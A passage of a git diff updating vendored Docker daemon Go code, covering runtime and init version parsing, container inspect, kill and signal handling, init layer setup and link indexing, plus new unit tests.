daemon // import "github.com/docker/docker/daemon" import ( "context" "os/exec" "strings" - "github.com/Sirupsen/logrus" "github.com/docker/docker/api/types" "github.com/docker/docker/dockerversion" "github.com/docker/docker/pkg/sysinfo" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // FillPlatformInfo fills the platform related info. @@ -27,16 +28,9 @@ func (daemon *Daemon) FillPlatformInfo(v *types.Info, sysInfo *sysinfo.SysInfo) v.DefaultRuntime = daemon.configStore.GetDefaultRuntimeName() v.InitBinary = daemon.configStore.GetInitPath() - v.ContainerdCommit.Expected = dockerversion.ContainerdCommitID - if sv, err := daemon.containerd.GetServerVersion(context.Background()); err == nil { - v.ContainerdCommit.ID = sv.Revision - } else { - logrus.Warnf("failed to retrieve containerd version: %v", err) - v.ContainerdCommit.ID = "N/A" - } - v.RuncCommit.Expected = dockerversion.RuncCommitID - if rv, err := exec.Command(DefaultRuntimeBinary, "--version").Output(); err == nil { + defaultRuntimeBinary := daemon.configStore.GetRuntime(v.DefaultRuntime).Path + if rv, err := exec.Command(defaultRuntimeBinary, "--version").Output(); err == nil { parts := strings.Split(strings.TrimSpace(string(rv)), "\n") if len(parts) == 3 { parts = strings.Split(parts[1], ": ") @@ -46,37 +40,54 @@ func (daemon *Daemon) FillPlatformInfo(v *types.Info, sysInfo *sysinfo.SysInfo) } if v.RuncCommit.ID == "" { - logrus.Warnf("failed to retrieve %s version: unknown output format: %s", DefaultRuntimeBinary, string(rv)) + logrus.Warnf("failed to retrieve %s version: unknown output format: %s", defaultRuntimeBinary, string(rv)) v.RuncCommit.ID = "N/A" } } else { - logrus.Warnf("failed to retrieve %s version: %v", DefaultRuntimeBinary, err) + logrus.Warnf("failed to retrieve %s version: %v", defaultRuntimeBinary, err) v.RuncCommit.ID = "N/A" } - v.InitCommit.Expected = dockerversion.InitCommitID - if rv, err := exec.Command(DefaultInitBinary, "--version").Output(); err == nil { - parts := strings.Split(strings.TrimSpace(string(rv)), " - ") - if len(parts) == 2 { - if dockerversion.InitCommitID[0] == 'v' { - vs := strings.TrimPrefix(parts[0], "tini version ") - v.InitCommit.ID = "v" + vs - } else { - // Get the sha1 - gitParts := strings.Split(parts[1], ".") - if len(gitParts) == 2 && gitParts[0] == "git" { - v.InitCommit.ID = gitParts[1] - v.InitCommit.Expected = dockerversion.InitCommitID[0:len(gitParts[1])] - } - } - } + v.ContainerdCommit.Expected = dockerversion.ContainerdCommitID + if rv, err := daemon.containerd.Version(context.Background()); err == nil { + v.ContainerdCommit.ID = rv.Revision + } else { + logrus.Warnf("failed to retrieve containerd version: %v", err) + v.ContainerdCommit.ID = "N/A" + } + + defaultInitBinary := daemon.configStore.GetInitPath() + if rv, err := exec.Command(defaultInitBinary, "--version").Output(); err == nil { + ver, err := parseInitVersion(string(rv)) - if v.InitCommit.ID == "" { - logrus.Warnf("failed to retrieve %s version: unknown output format: %s", DefaultInitBinary, string(rv)) - v.InitCommit.ID = "N/A" + if err != nil { + logrus.Warnf("failed to retrieve %s version: %s", defaultInitBinary, err) } + v.InitCommit = ver } else { - logrus.Warnf("failed to retrieve %s version", DefaultInitBinary) + logrus.Warnf("failed to retrieve %s version: %s", defaultInitBinary, err) v.InitCommit.ID = "N/A" } } + +// parseInitVersion parses a Tini version string, and extracts the version. +func parseInitVersion(v string) (types.Commit, error) { + version := types.Commit{ID: "", Expected: dockerversion.InitCommitID} + parts := strings.Split(strings.TrimSpace(v), " - ") + + if len(parts) >= 2 { + gitParts := strings.Split(parts[1], ".") + if len(gitParts) == 2 && gitParts[0] == "git" { + version.ID = gitParts[1] + version.Expected = dockerversion.InitCommitID[0:len(version.ID)] + } + } + if version.ID == "" && strings.HasPrefix(parts[0], "tini version ") { + version.ID = "v" + strings.TrimPrefix(parts[0], "tini version ") + } + if version.ID == "" { + version.ID = "N/A" + return version, errors.Errorf("unknown output format: %s", v) + } + return version, nil +} diff --git a/vendor/github.com/docker/docker/daemon/info_unix_test.go b/vendor/github.com/docker/docker/daemon/info_unix_test.go new file mode 100644 index 0000000000..a5a4e06f98 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/info_unix_test.go @@ -0,0 +1,53 @@ +// +build !windows + +package daemon // import "github.com/docker/docker/daemon" + +import ( + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/dockerversion" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestParseInitVersion(t *testing.T) { + tests := []struct { + version string + result types.Commit + invalid bool + }{ + { + version: "tini version 0.13.0 - git.949e6fa", + result: types.Commit{ID: "949e6fa", Expected: dockerversion.InitCommitID[0:7]}, + }, { + version: "tini version 0.13.0\n", + result: types.Commit{ID: "v0.13.0", Expected: dockerversion.InitCommitID}, + }, { + version: "tini version 0.13.2", + result: types.Commit{ID: "v0.13.2", Expected: dockerversion.InitCommitID}, + }, { + version: "tini version0.13.2", + result: types.Commit{ID: "N/A", Expected: dockerversion.InitCommitID}, + invalid: true, + }, { + version: "", + result: types.Commit{ID: "N/A", Expected: dockerversion.InitCommitID}, + invalid: true, + }, { + version: "hello world", + result: types.Commit{ID: "N/A", Expected: dockerversion.InitCommitID}, + invalid: true, + }, + } + + for _, test := range tests { + ver, err := parseInitVersion(string(test.version)) + if test.invalid { + assert.Check(t, is.ErrorContains(err, "")) + } else { + assert.Check(t, err) + } + assert.Check(t, is.DeepEqual(test.result, ver)) + } +} diff --git a/vendor/github.com/docker/docker/daemon/info_windows.go b/vendor/github.com/docker/docker/daemon/info_windows.go index c700911eb0..e452369fc8 100644 --- a/vendor/github.com/docker/docker/daemon/info_windows.go +++ b/vendor/github.com/docker/docker/daemon/info_windows.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "github.com/docker/docker/api/types" diff --git a/vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go b/vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go deleted file mode 100644 index 66d53f0eef..0000000000 --- a/vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go +++ /dev/null @@ -1,13 +0,0 @@ -// +build solaris,cgo - -package initlayer - -// Setup populates a directory with mountpoints suitable -// for bind-mounting dockerinit into the container. The mountpoint is simply an -// empty file at /.dockerinit -// -// This extra layer is used by all containers as the top-most ro layer. It protects -// the container from unwanted side-effects on the rw layer. -func Setup(initLayer string, rootUID, rootGID int) error { - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go b/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go index e83c2751ed..035f62075f 100644 --- a/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go +++ b/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go @@ -1,14 +1,15 @@ // +build linux freebsd -package initlayer +package initlayer // import "github.com/docker/docker/daemon/initlayer" import ( "os" "path/filepath" "strings" - "syscall" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" + "golang.org/x/sys/unix" ) // Setup populates a directory with mountpoints suitable @@ -16,7 +17,10 @@ import ( // // This extra layer is used by all containers as the top-most ro layer. It protects // the container from unwanted side-effects on the rw layer. -func Setup(initLayer string, rootUID, rootGID int) error { +func Setup(initLayerFs containerfs.ContainerFS, rootIDs idtools.IDPair) error { + // Since all paths are local to the container, we can just extract initLayerFs.Path() + initLayer := initLayerFs.Path() + for pth, typ := range map[string]string{ "/dev/pts": "dir", "/dev/shm": "dir", @@ -33,17 +37,17 @@ func Setup(initLayer string, rootUID, rootGID int) error { prev := "/" for _, p := range parts[1:] { prev = filepath.Join(prev, p) - syscall.Unlink(filepath.Join(initLayer, prev)) + unix.Unlink(filepath.Join(initLayer, prev)) } if _, err := os.Stat(filepath.Join(initLayer, pth)); err != nil { if os.IsNotExist(err) { - if err := idtools.MkdirAllNewAs(filepath.Join(initLayer, filepath.Dir(pth)), 0755, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChownNew(filepath.Join(initLayer, filepath.Dir(pth)), 0755, rootIDs); err != nil { return err } switch typ { case "dir": - if err := idtools.MkdirAllNewAs(filepath.Join(initLayer, pth), 0755, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChownNew(filepath.Join(initLayer, pth), 0755, rootIDs); err != nil { return err } case "file": @@ -51,7 +55,7 @@ func Setup(initLayer string, rootUID, rootGID int) error { if err != nil { return err } - f.Chown(rootUID, rootGID) + f.Chown(rootIDs.UID, rootIDs.GID) f.Close() default: if err := os.Symlink(typ, filepath.Join(initLayer, pth)); err != nil { diff --git a/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go b/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go index 48a9d71aa5..1032092e62 100644 --- a/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go +++ b/vendor/github.com/docker/docker/daemon/initlayer/setup_windows.go @@ -1,6 +1,9 @@ -// +build windows +package initlayer // import "github.com/docker/docker/daemon/initlayer" -package initlayer +import ( + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/idtools" +) // Setup populates a directory with mountpoints suitable // for bind-mounting dockerinit into the container. The mountpoint is simply an @@ -8,6 +11,6 @@ package initlayer // // This extra layer is used by all containers as the top-most ro layer. It protects // the container from unwanted side-effects on the rw layer. -func Setup(initLayer string, rootUID, rootGID int) error { +func Setup(initLayer containerfs.ContainerFS, rootIDs idtools.IDPair) error { return nil } diff --git a/vendor/github.com/docker/docker/daemon/inspect.go b/vendor/github.com/docker/docker/daemon/inspect.go index 557f639de1..45a2154254 100644 --- a/vendor/github.com/docker/docker/daemon/inspect.go +++ b/vendor/github.com/docker/docker/daemon/inspect.go @@ -1,6 +1,7 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "errors" "fmt" "time" @@ -11,6 +12,8 @@ import ( "github.com/docker/docker/api/types/versions/v1p20" "github.com/docker/docker/container" "github.com/docker/docker/daemon/network" + "github.com/docker/docker/errdefs" + "github.com/docker/go-connections/nat" ) // ContainerInspect returns low-level information about a @@ -35,21 +38,22 @@ func (daemon *Daemon) ContainerInspectCurrent(name string, size bool) (*types.Co } container.Lock() - defer container.Unlock() - base, err := daemon.getInspectData(container, size) + base, err := daemon.getInspectData(container) if err != nil { + container.Unlock() return nil, err } apiNetworks := make(map[string]*networktypes.EndpointSettings) for name, epConf := range container.NetworkSettings.Networks { if epConf.EndpointSettings != nil { - apiNetworks[name] = epConf.EndpointSettings + // We must make a copy of this pointer object otherwise it can race with other operations + apiNetworks[name] = epConf.EndpointSettings.Copy() } } - mountPoints := addMountPoints(container) + mountPoints := container.GetMountPoints() networkSettings := &types.NetworkSettings{ NetworkSettingsBase: types.NetworkSettingsBase{ Bridge: container.NetworkSettings.Bridge, @@ -57,7 +61,6 @@ func (daemon *Daemon) ContainerInspectCurrent(name string, size bool) (*types.Co HairpinMode: container.NetworkSettings.HairpinMode, LinkLocalIPv6Address: container.NetworkSettings.LinkLocalIPv6Address, LinkLocalIPv6PrefixLen: container.NetworkSettings.LinkLocalIPv6PrefixLen, - Ports: container.NetworkSettings.Ports, SandboxKey: container.NetworkSettings.SandboxKey, SecondaryIPAddresses: container.NetworkSettings.SecondaryIPAddresses, SecondaryIPv6Addresses: container.NetworkSettings.SecondaryIPv6Addresses, @@ -66,6 +69,20 @@ func (daemon *Daemon) ContainerInspectCurrent(name string, size bool) (*types.Co Networks: apiNetworks, } + ports := make(nat.PortMap, len(container.NetworkSettings.Ports)) + for k, pm := range container.NetworkSettings.Ports { + ports[k] = pm + } + networkSettings.NetworkSettingsBase.Ports = ports + + container.Unlock() + + if size { + sizeRw, sizeRootFs := daemon.imageService.GetContainerLayerSize(base.ID) + base.SizeRw = &sizeRw + base.SizeRootFs = &sizeRootFs + } + return &types.ContainerJSON{ ContainerJSONBase: base, Mounts: mountPoints, @@ -84,12 +101,12 @@ func (daemon *Daemon) containerInspect120(name string) (*v1p20.ContainerJSON, er container.Lock() defer container.Unlock() - base, err := daemon.getInspectData(container, false) + base, err := daemon.getInspectData(container) if err != nil { return nil, err } - mountPoints := addMountPoints(container) + mountPoints := container.GetMountPoints() config := &v1p20.ContainerConfig{ Config: container.Config, MacAddress: container.Config.MacAddress, @@ -107,7 +124,7 @@ func (daemon *Daemon) containerInspect120(name string) (*v1p20.ContainerJSON, er }, nil } -func (daemon *Daemon) getInspectData(container *container.Container, size bool) (*types.ContainerJSONBase, error) { +func (daemon *Daemon) getInspectData(container *container.Container) (*types.ContainerJSONBase, error) { // make a copy to play with hostConfig := *container.HostConfig @@ -123,7 +140,7 @@ func (daemon *Daemon) getInspectData(container *container.Container, size bool) var containerHealth *types.Health if container.State.Health != nil { containerHealth = &types.Health{ - Status: container.State.Health.Status, + Status: container.State.Health.Status(), FailingStreak: container.State.Health.FailingStreak, Log: append([]*types.HealthcheckResult{}, container.State.Health.Log...), } @@ -138,7 +155,7 @@ func (daemon *Daemon) getInspectData(container *container.Container, size bool) Dead: container.State.Dead, Pid: container.State.Pid, ExitCode: container.State.ExitCode(), - Error: container.State.Error(), + Error: container.State.ErrorMsg, StartedAt: container.State.StartedAt.Format(time.RFC3339Nano), FinishedAt: container.State.FinishedAt.Format(time.RFC3339Nano), Health: containerHealth, @@ -155,35 +172,36 @@ func (daemon *Daemon) getInspectData(container *container.Container, size bool) Name: container.Name, RestartCount: container.RestartCount, Driver: container.Driver, + Platform: container.OS, MountLabel: container.MountLabel, ProcessLabel: container.ProcessLabel, ExecIDs: container.GetExecIDs(), HostConfig: &hostConfig, } - var ( - sizeRw int64 - sizeRootFs int64 - ) - if size { - sizeRw, sizeRootFs = daemon.getSize(container) - contJSONBase.SizeRw = &sizeRw - contJSONBase.SizeRootFs = &sizeRootFs - } - // Now set any platform-specific fields contJSONBase = setPlatformSpecificContainerFields(container, contJSONBase) contJSONBase.GraphDriver.Name = container.Driver + if container.RWLayer == nil { + if container.Dead { + return contJSONBase, nil + } + return nil, errdefs.System(errors.New("RWLayer of container " + container.ID + " is unexpectedly nil")) + } + graphDriverData, err := container.RWLayer.Metadata() // If container is marked as Dead, the container's graphdriver metadata // could have been removed, it will cause error if we try to get the metadata, // we can ignore the error if the container is dead. - if err != nil && !container.Dead { - return nil, err + if err != nil { + if !container.Dead { + return nil, errdefs.System(err) + } + } else { + contJSONBase.GraphDriver.Data = graphDriverData } - contJSONBase.GraphDriver.Data = graphDriverData return contJSONBase, nil } @@ -191,9 +209,13 @@ func (daemon *Daemon) getInspectData(container *container.Container, size bool) // ContainerExecInspect returns low-level information about the exec // command. An error is returned if the exec cannot be found. func (daemon *Daemon) ContainerExecInspect(id string) (*backend.ExecInspect, error) { - e, err := daemon.getExecConfig(id) - if err != nil { - return nil, err + e := daemon.execCommands.Get(id) + if e == nil { + return nil, errExecNotFound(id) + } + + if container := daemon.containers.Get(e.ContainerID); container == nil { + return nil, errExecNotFound(id) } pc := inspectExecProcessConfig(e) @@ -213,19 +235,6 @@ func (daemon *Daemon) ContainerExecInspect(id string) (*backend.ExecInspect, err }, nil } -// VolumeInspect looks up a volume by name. An error is returned if -// the volume cannot be found. -func (daemon *Daemon) VolumeInspect(name string) (*types.Volume, error) { - v, err := daemon.volumes.Get(name) - if err != nil { - return nil, err - } - apiV := volumeToAPIType(v) - apiV.Mountpoint = v.Path() - apiV.Status = v.Status() - return apiV, nil -} - func (daemon *Daemon) getBackwardsCompatibleNetworkSettings(settings *network.Settings) *v1p20.NetworkSettings { result := &v1p20.NetworkSettings{ NetworkSettingsBase: types.NetworkSettingsBase{ diff --git a/vendor/github.com/docker/docker/daemon/inspect_unix.go b/vendor/github.com/docker/docker/daemon/inspect_linux.go similarity index 78% rename from vendor/github.com/docker/docker/daemon/inspect_unix.go rename to vendor/github.com/docker/docker/daemon/inspect_linux.go index 08a82235ad..77a4c44d79 100644 --- a/vendor/github.com/docker/docker/daemon/inspect_unix.go +++ b/vendor/github.com/docker/docker/daemon/inspect_linux.go @@ -1,6 +1,4 @@ -// +build !windows,!solaris - -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "github.com/docker/docker/api/types" @@ -30,7 +28,7 @@ func (daemon *Daemon) containerInspectPre120(name string) (*v1p19.ContainerJSON, container.Lock() defer container.Unlock() - base, err := daemon.getInspectData(container, false) + base, err := daemon.getInspectData(container) if err != nil { return nil, err } @@ -64,23 +62,6 @@ func (daemon *Daemon) containerInspectPre120(name string) (*v1p19.ContainerJSON, }, nil } -func addMountPoints(container *container.Container) []types.MountPoint { - mountPoints := make([]types.MountPoint, 0, len(container.MountPoints)) - for _, m := range container.MountPoints { - mountPoints = append(mountPoints, types.MountPoint{ - Type: m.Type, - Name: m.Name, - Source: m.Path(), - Destination: m.Destination, - Driver: m.Driver, - Mode: m.Mode, - RW: m.RW, - Propagation: m.Propagation, - }) - } - return mountPoints -} - func inspectExecProcessConfig(e *exec.Config) *backend.ExecProcessConfig { return &backend.ExecProcessConfig{ Tty: e.Tty, diff --git a/vendor/github.com/docker/docker/daemon/inspect_solaris.go b/vendor/github.com/docker/docker/daemon/inspect_solaris.go deleted file mode 100644 index 0e3dcc1119..0000000000 --- a/vendor/github.com/docker/docker/daemon/inspect_solaris.go +++ /dev/null @@ -1,41 +0,0 @@ -package daemon - -import ( - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/backend" - "github.com/docker/docker/api/types/versions/v1p19" - "github.com/docker/docker/container" - "github.com/docker/docker/daemon/exec" -) - -// This sets platform-specific fields -func setPlatformSpecificContainerFields(container *container.Container, contJSONBase *types.ContainerJSONBase) *types.ContainerJSONBase { - return contJSONBase -} - -// containerInspectPre120 get containers for pre 1.20 APIs. -func (daemon *Daemon) containerInspectPre120(name string) (*v1p19.ContainerJSON, error) { - return &v1p19.ContainerJSON{}, nil -} - -func addMountPoints(container *container.Container) []types.MountPoint { - mountPoints := make([]types.MountPoint, 0, len(container.MountPoints)) - for _, m := range container.MountPoints { - mountPoints = append(mountPoints, types.MountPoint{ - Name: m.Name, - Source: m.Path(), - Destination: m.Destination, - Driver: m.Driver, - RW: m.RW, - }) - } - return mountPoints -} - -func inspectExecProcessConfig(e *exec.Config) *backend.ExecProcessConfig { - return &backend.ExecProcessConfig{ - Tty: e.Tty, - Entrypoint: e.Entrypoint, - Arguments: e.Args, - } -} diff --git a/vendor/github.com/docker/docker/daemon/inspect_test.go b/vendor/github.com/docker/docker/daemon/inspect_test.go new file mode 100644 index 0000000000..f402a7af99 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/inspect_test.go @@ -0,0 +1,33 @@ +package daemon // import "github.com/docker/docker/daemon" + +import ( + "testing" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/daemon/exec" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestGetInspectData(t *testing.T) { + c := &container.Container{ + ID: "inspect-me", + HostConfig: &containertypes.HostConfig{}, + State: container.NewState(), + ExecCommands: exec.NewStore(), + } + + d := &Daemon{ + linkIndex: newLinkIndex(), + configStore: &config.Config{}, + } + + _, err := d.getInspectData(c) + assert.Check(t, is.ErrorContains(err, "")) + + c.Dead = true + _, err = d.getInspectData(c) + assert.Check(t, err) +} diff --git a/vendor/github.com/docker/docker/daemon/inspect_windows.go b/vendor/github.com/docker/docker/daemon/inspect_windows.go index b331c83ca3..12fda670df 100644 --- a/vendor/github.com/docker/docker/daemon/inspect_windows.go +++ b/vendor/github.com/docker/docker/daemon/inspect_windows.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "github.com/docker/docker/api/types" @@ -12,21 +12,6 @@ func setPlatformSpecificContainerFields(container *container.Container, contJSON return contJSONBase } -func addMountPoints(container *container.Container) []types.MountPoint { - mountPoints := make([]types.MountPoint, 0, len(container.MountPoints)) - for _, m := range container.MountPoints { - mountPoints = append(mountPoints, types.MountPoint{ - Type: m.Type, - Name: m.Name, - Source: m.Path(), - Destination: m.Destination, - Driver: m.Driver, - RW: m.RW, - }) - } - return mountPoints -} - // containerInspectPre120 get containers for pre 1.20 APIs. func (daemon *Daemon) containerInspectPre120(name string) (*types.ContainerJSON, error) { return daemon.ContainerInspectCurrent(name, false) diff --git a/vendor/github.com/docker/docker/daemon/keys.go b/vendor/github.com/docker/docker/daemon/keys.go index 055d488a5d..946eaaab1c 100644 --- a/vendor/github.com/docker/docker/daemon/keys.go +++ b/vendor/github.com/docker/docker/daemon/keys.go @@ -1,6 +1,6 @@ // +build linux -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" diff --git a/vendor/github.com/docker/docker/daemon/keys_unsupported.go b/vendor/github.com/docker/docker/daemon/keys_unsupported.go index b17255940a..2ccdb576d7 100644 --- a/vendor/github.com/docker/docker/daemon/keys_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/keys_unsupported.go @@ -1,8 +1,8 @@ // +build !linux -package daemon +package daemon // import "github.com/docker/docker/daemon" -// ModifyRootKeyLimit is an noop on unsupported platforms. +// ModifyRootKeyLimit is a noop on unsupported platforms. func ModifyRootKeyLimit() error { return nil } diff --git a/vendor/github.com/docker/docker/daemon/kill.go b/vendor/github.com/docker/docker/daemon/kill.go index 18d5bbb4e5..5034c4df39 100644 --- a/vendor/github.com/docker/docker/daemon/kill.go +++ b/vendor/github.com/docker/docker/daemon/kill.go @@ -1,15 +1,18 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "runtime" - "strings" "syscall" "time" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/container" + containerpkg "github.com/docker/docker/container" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/libcontainerd" "github.com/docker/docker/pkg/signal" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) type errNoSuchProcess struct { @@ -21,6 +24,8 @@ func (e errNoSuchProcess) Error() string { return fmt.Sprintf("Cannot kill process (pid=%d) with signal %d: no such process.", e.pid, e.signal) } +func (errNoSuchProcess) NotFound() {} + // isErrNoSuchProcess returns true if the error // is an instance of errNoSuchProcess. func isErrNoSuchProcess(err error) bool { @@ -54,30 +59,30 @@ func (daemon *Daemon) ContainerKill(name string, sig uint64) error { // to send the signal. An error is returned if the container is paused // or not running, or if there is a problem returned from the // underlying kill command. -func (daemon *Daemon) killWithSignal(container *container.Container, sig int) error { +func (daemon *Daemon) killWithSignal(container *containerpkg.Container, sig int) error { logrus.Debugf("Sending kill signal %d to container %s", sig, container.ID) container.Lock() defer container.Unlock() - // We could unpause the container for them rather than returning this error - if container.Paused { - return fmt.Errorf("Container %s is paused. Unpause the container before stopping", container.ID) - } + daemon.stopHealthchecks(container) if !container.Running { - return errNotRunning{container.ID} + return errNotRunning(container.ID) } - if container.Config.StopSignal != "" { + var unpause bool + if container.Config.StopSignal != "" && syscall.Signal(sig) != syscall.SIGKILL { containerStopSignal, err := signal.ParseSignal(container.Config.StopSignal) if err != nil { return err } if containerStopSignal == syscall.Signal(sig) { container.ExitOnNext() + unpause = container.Paused } } else { container.ExitOnNext() + unpause = container.Paused } if !daemon.IsShuttingDown() { @@ -92,13 +97,18 @@ func (daemon *Daemon) killWithSignal(container *container.Container, sig int) er } if err := daemon.kill(container, sig); err != nil { - err = fmt.Errorf("Cannot kill container %s: %s", container.ID, err) - // if container or process not exists, ignore the error - if strings.Contains(err.Error(), "container not found") || - strings.Contains(err.Error(), "no such process") { - logrus.Warnf("container kill failed because of 'container not found' or 'no such process': %s", err.Error()) + if errdefs.IsNotFound(err) { + unpause = false + logrus.WithError(err).WithField("container", container.ID).WithField("action", "kill").Debug("container kill failed because of 'container not found' or 'no such process'") } else { - return err + return errors.Wrapf(err, "Cannot kill container %s", container.ID) + } + } + + if unpause { + // above kill signal will be sent once resume is finished + if err := daemon.containerd.Resume(context.Background(), container.ID); err != nil { + logrus.Warn("Cannot unpause container %s: %s", container.ID, err) } } @@ -110,16 +120,16 @@ func (daemon *Daemon) killWithSignal(container *container.Container, sig int) er } // Kill forcefully terminates a container. -func (daemon *Daemon) Kill(container *container.Container) error { +func (daemon *Daemon) Kill(container *containerpkg.Container) error { if !container.IsRunning() { - return errNotRunning{container.ID} + return errNotRunning(container.ID) } // 1. Send SIGKILL if err := daemon.killPossiblyDeadProcess(container, int(syscall.SIGKILL)); err != nil { // While normally we might "return err" here we're not going to // because if we can't stop the container by this point then - // its probably because its already stopped. Meaning, between + // it's probably because it's already stopped. Meaning, between // the time of the IsRunning() call above and now it stopped. // Also, since the err return will be environment specific we can't // look for any particular (common) error that would indicate @@ -131,7 +141,10 @@ func (daemon *Daemon) Kill(container *container.Container) error { return nil } - if _, err2 := container.WaitStop(2 * time.Second); err2 != nil { + ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second) + defer cancel() + + if status := <-container.Wait(ctx, containerpkg.WaitConditionNotRunning); status.Err() != nil { return err } } @@ -144,14 +157,17 @@ func (daemon *Daemon) Kill(container *container.Container) error { return err } - container.WaitStop(-1 * time.Second) + // Wait for exit with no timeout. + // Ignore returned status. + <-container.Wait(context.Background(), containerpkg.WaitConditionNotRunning) + return nil } // killPossibleDeadProcess is a wrapper around killSig() suppressing "no such process" error. -func (daemon *Daemon) killPossiblyDeadProcess(container *container.Container, sig int) error { +func (daemon *Daemon) killPossiblyDeadProcess(container *containerpkg.Container, sig int) error { err := daemon.killWithSignal(container, sig) - if err == syscall.ESRCH { + if errdefs.IsNotFound(err) { e := errNoSuchProcess{container.GetPID(), sig} logrus.Debug(e) return e @@ -159,6 +175,6 @@ func (daemon *Daemon) killPossiblyDeadProcess(container *container.Container, si return err } -func (daemon *Daemon) kill(c *container.Container, sig int) error { - return daemon.containerd.Signal(c.ID, sig) +func (daemon *Daemon) kill(c *containerpkg.Container, sig int) error { + return daemon.containerd.SignalProcess(context.Background(), c.ID, libcontainerd.InitProcessName, sig) } diff --git a/vendor/github.com/docker/docker/daemon/links.go b/vendor/github.com/docker/docker/daemon/links.go index 7f691d4f16..1639572fa8 100644 --- a/vendor/github.com/docker/docker/daemon/links.go +++ b/vendor/github.com/docker/docker/daemon/links.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "sync" @@ -76,12 +76,16 @@ func (l *linkIndex) parents(child *container.Container) map[string]*container.Co } // delete deletes all link relationships referencing this container -func (l *linkIndex) delete(container *container.Container) { +func (l *linkIndex) delete(container *container.Container) []string { l.mu.Lock() - for _, child := range l.idx[container] { + + var aliases []string + for alias, child := range l.idx[container] { + aliases = append(aliases, alias) delete(l.childIdx[child], container) } delete(l.idx, container) delete(l.childIdx, container) l.mu.Unlock() + return aliases } diff --git a/vendor/github.com/docker/docker/daemon/links/links.go b/vendor/github.com/docker/docker/daemon/links/links.go index af15de046d..2bcb483259 100644 --- a/vendor/github.com/docker/docker/daemon/links/links.go +++ b/vendor/github.com/docker/docker/daemon/links/links.go @@ -1,4 +1,4 @@ -package links +package links // import "github.com/docker/docker/daemon/links" import ( "fmt" diff --git a/vendor/github.com/docker/docker/daemon/links/links_test.go b/vendor/github.com/docker/docker/daemon/links/links_test.go index 0273f13cf0..e1b36dbbd9 100644 --- a/vendor/github.com/docker/docker/daemon/links/links_test.go +++ b/vendor/github.com/docker/docker/daemon/links/links_test.go @@ -1,4 +1,4 @@ -package links +package links // import "github.com/docker/docker/daemon/links" import ( "fmt" @@ -33,7 +33,7 @@ func TestLinkNaming(t *testing.T) { value, ok := env["DOCKER_1_PORT"] if !ok { - t.Fatalf("DOCKER_1_PORT not found in env") + t.Fatal("DOCKER_1_PORT not found in env") } if value != "tcp://172.0.17.2:6379" { @@ -192,21 +192,21 @@ func TestLinkPortRangeEnv(t *testing.T) { if env["DOCKER_ENV_PASSWORD"] != "gordon" { t.Fatalf("Expected gordon, got %s", env["DOCKER_ENV_PASSWORD"]) } - for i := range []int{6379, 6380, 6381} { + for _, i := range []int{6379, 6380, 6381} { tcpaddr := fmt.Sprintf("DOCKER_PORT_%d_TCP_ADDR", i) - tcpport := fmt.Sprintf("DOCKER_PORT_%d_TCP+PORT", i) - tcpproto := fmt.Sprintf("DOCKER_PORT_%d_TCP+PROTO", i) + tcpport := fmt.Sprintf("DOCKER_PORT_%d_TCP_PORT", i) + tcpproto := fmt.Sprintf("DOCKER_PORT_%d_TCP_PROTO", i) tcp := fmt.Sprintf("DOCKER_PORT_%d_TCP", i) - if env[tcpaddr] == "172.0.17.2" { + if env[tcpaddr] != "172.0.17.2" { t.Fatalf("Expected env %s = 172.0.17.2, got %s", tcpaddr, env[tcpaddr]) } - if env[tcpport] == fmt.Sprintf("%d", i) { + if env[tcpport] != fmt.Sprintf("%d", i) { t.Fatalf("Expected env %s = %d, got %s", tcpport, i, env[tcpport]) } - if env[tcpproto] == "tcp" { + if env[tcpproto] != "tcp" { t.Fatalf("Expected env %s = tcp, got %s", tcpproto, env[tcpproto]) } - if env[tcp] == fmt.Sprintf("tcp://172.0.17.2:%d", i) { + if env[tcp] != fmt.Sprintf("tcp://172.0.17.2:%d", i) { t.Fatalf("Expected env %s = tcp://172.0.17.2:%d, got %s", tcp, i, env[tcp]) } } diff --git a/vendor/github.com/docker/docker/daemon/links_linux.go b/vendor/github.com/docker/docker/daemon/links_linux.go deleted file mode 100644 index 2ea40d9e51..0000000000 --- a/vendor/github.com/docker/docker/daemon/links_linux.go +++ /dev/null @@ -1,72 +0,0 @@ -package daemon - -import ( - "fmt" - "path/filepath" - "strings" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/container" - "github.com/docker/docker/pkg/graphdb" -) - -// migrateLegacySqliteLinks migrates sqlite links to use links from HostConfig -// when sqlite links were used, hostConfig.Links was set to nil -func (daemon *Daemon) migrateLegacySqliteLinks(db *graphdb.Database, container *container.Container) error { 